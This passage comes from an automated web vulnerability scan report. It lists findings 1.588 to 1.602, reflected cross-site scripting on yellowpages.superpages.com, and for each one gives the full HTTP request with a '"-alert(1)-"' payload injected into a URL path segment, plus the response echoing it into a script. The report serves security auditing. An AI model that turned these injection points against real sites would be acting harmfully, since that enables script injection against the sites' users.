                                   
...[SNIP]...
owpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/structure.cssb1738"-alert(1)-"099ed66255a?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.588. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/styles.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 992a6"-alert(1)-"25f8f156e7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common992a6"-alert(1)-"25f8f156e7b/css/styles.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common992a6&quot;-alert(1)-&quot;25f8f156e7b/css/styles.css
Server: Unspecified
Set-Cookie: JSESSIONID=3211127661936C99371FE25634686EA3; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:58 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common992a6"-alert(1)-"25f8f156e7b/css/styles.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.589. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/styles.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd028"-alert(1)-"da24c435281 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/cssdd028"-alert(1)-"da24c435281/styles.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/cssdd028&quot;-alert(1)-&quot;da24c435281/styles.css
Server: Unspecified
Set-Cookie: JSESSIONID=8987766902F63B3992E6CA214283A0CE; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:06 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/cssdd028"-alert(1)-"da24c435281/styles.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.590. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/styles.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67e49"-alert(1)-"cece7288702 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/styles.css67e49"-alert(1)-"cece7288702 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/styles.css67e49&quot;-alert(1)-&quot;cece7288702
Server: Unspecified
Set-Cookie: JSESSIONID=3D234B69705369EA8A13C831B4DC2D38; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:15 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
ellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/styles.css67e49"-alert(1)-"cece7288702?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.591. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/typography.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd884"-alert(1)-"66558d398fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commondd884"-alert(1)-"66558d398fa/css/typography.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commondd884&quot;-alert(1)-&quot;66558d398fa/css/typography.css
Server: Unspecified
Set-Cookie: JSESSIONID=8C9E587A9A2B11245C4CB313D66A5039; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:28 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commondd884"-alert(1)-"66558d398fa/css/typography.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.592. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/typography.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cec5"-alert(1)-"d776eed8f91 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css6cec5"-alert(1)-"d776eed8f91/typography.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css6cec5&quot;-alert(1)-&quot;d776eed8f91/typography.css
Server: Unspecified
Set-Cookie: JSESSIONID=0FE3B1548143B2CCE3AB4A9092140C80; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:37 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css6cec5"-alert(1)-"d776eed8f91/typography.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.593. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/typography.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c512b"-alert(1)-"208ebd640d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/typography.cssc512b"-alert(1)-"208ebd640d3 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/typography.cssc512b&quot;-alert(1)-&quot;208ebd640d3
Server: Unspecified
Set-Cookie: JSESSIONID=BE70921D9EFA0EDB349E547050E51902; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:45 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
wpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/typography.cssc512b"-alert(1)-"208ebd640d3?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.594. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/alertcommon.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1603f"-alert(1)-"7b40bab0d58 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common1603f"-alert(1)-"7b40bab0d58/js/alertcommon.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common1603f&quot;-alert(1)-&quot;7b40bab0d58/js/alertcommon.js
Server: Unspecified
Set-Cookie: JSESSIONID=31374E21CBB6E62331151FDD9D287B6E; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:30 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common1603f"-alert(1)-"7b40bab0d58/js/alertcommon.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.595. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/alertcommon.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20813"-alert(1)-"42f38a119fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js20813"-alert(1)-"42f38a119fb/alertcommon.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js20813&quot;-alert(1)-&quot;42f38a119fb/alertcommon.js
Server: Unspecified
Set-Cookie: JSESSIONID=1964063886F42A385D9BF560E5991661; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:37 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js20813"-alert(1)-"42f38a119fb/alertcommon.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.596. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/alertcommon.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c615e"-alert(1)-"fd5addf1395 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/alertcommon.jsc615e"-alert(1)-"fd5addf1395 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/alertcommon.jsc615e&quot;-alert(1)-&quot;fd5addf1395
Server: Unspecified
Set-Cookie: JSESSIONID=C42F1F43179B33DCF485D91863AA0026; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:44 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
owpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/alertcommon.jsc615e"-alert(1)-"fd5addf1395?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.597. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/browser_check.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bae19"-alert(1)-"9957299e054 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commonbae19"-alert(1)-"9957299e054/js/browser_check.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commonbae19&quot;-alert(1)-&quot;9957299e054/js/browser_check.js
Server: Unspecified
Set-Cookie: JSESSIONID=E09C44F1BBBAA213F4E42EF428D3F357; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:27 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commonbae19"-alert(1)-"9957299e054/js/browser_check.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.598. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/browser_check.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67314"-alert(1)-"4d0383f1bcf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js67314"-alert(1)-"4d0383f1bcf/browser_check.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js67314&quot;-alert(1)-&quot;4d0383f1bcf/browser_check.js
Server: Unspecified
Set-Cookie: JSESSIONID=36F4629CEBB28C41CD456D4BA38FDE53; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:44 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js67314"-alert(1)-"4d0383f1bcf/browser_check.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.599. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/browser_check.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4823"-alert(1)-"6b96276b57d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/browser_check.jsb4823"-alert(1)-"6b96276b57d HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/browser_check.jsb4823&quot;-alert(1)-&quot;6b96276b57d
Server: Unspecified
Set-Cookie: JSESSIONID=3F77784525870BE1A8C596BB0EA60651; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:51 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
pages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/browser_check.jsb4823"-alert(1)-"6b96276b57d?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.600. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/iepopup.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa65f"-alert(1)-"34ef4e6041c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commonaa65f"-alert(1)-"34ef4e6041c/js/iepopup.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commonaa65f&quot;-alert(1)-&quot;34ef4e6041c/js/iepopup.js
Server: Unspecified
Set-Cookie: JSESSIONID=2134AC985409415C2A045A7FF6023BCE; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:41 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commonaa65f"-alert(1)-"34ef4e6041c/js/iepopup.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.601. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/iepopup.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7547e"-alert(1)-"e77ecaba831 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js7547e"-alert(1)-"e77ecaba831/iepopup.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js7547e&quot;-alert(1)-&quot;e77ecaba831/iepopup.js
Server: Unspecified
Set-Cookie: JSESSIONID=BA40BC8F6A7DD188B47568ADA942F69A; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:00 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js7547e"-alert(1)-"e77ecaba831/iepopup.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.602. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/iepopup.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57121"-alert(1)-"a019059d18b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

